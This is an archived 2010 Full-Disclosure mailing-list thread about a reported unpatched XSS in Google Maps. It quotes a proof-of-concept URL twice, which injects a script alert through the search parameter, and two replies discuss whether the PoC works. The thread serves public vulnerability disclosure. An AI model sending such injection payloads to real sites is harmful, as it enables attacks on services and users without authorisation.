| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 12 Jan 2010 14:02:16 +0100 From: Christian Sciberras <uuf6429@...il.com> To: Michael Lenz <shadow.stalker@....de> Cc: full-disclosure@...ts.grok.org.uk Subject: Re: Google Maps XSS (currently unpatched) I tried the PoC and it works as advertised, however due to the amount of requests to the same url, I suppose Google noticed something fishy... Regards, Chris. On Tue, Jan 12, 2010 at 1:58 PM, Michael Lenz <shadow.stalker@....de> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Your PoC generates: > > " > *Google* > Sorry... > > > We're sorry... > > ... but your computer or network may be sending automated queries. To > protect our users, we can't process your request right now. > > See Google Help > <http://www.google.com/support/bin/answer.py?answer=86640> for more > information. > > © 2009 Google - Google Home <http://www.google.com>" > > > So..? > > gaurav baruah schrieb: >> Google Maps XSS (currently unpatched) >> >> Discovered By - >> Pratul Agrawal (pratul2u@...il.com) >> Gaurav Baruah (baruah.gaurav@...il.com) >> >> >> PoC - > http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8 >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > gaurav baruah schrieb: >> Google Maps XSS (currently unpatched) >> >> Discovered By - >> Pratul Agrawal (pratul2u@...il.com) >> Gaurav Baruah (baruah.gaurav@...il.com) >> >> >> PoC - > http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8 >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.9 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iEYEARECAAYFAktMcfAACgkQ12k6J+72BxijGwCgvA7qEWtv8D9ImB9vGc8FBkZf > xOUAnjUQ3dhG6bGwg690pqDXLyzeDQYC > =GYKt > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists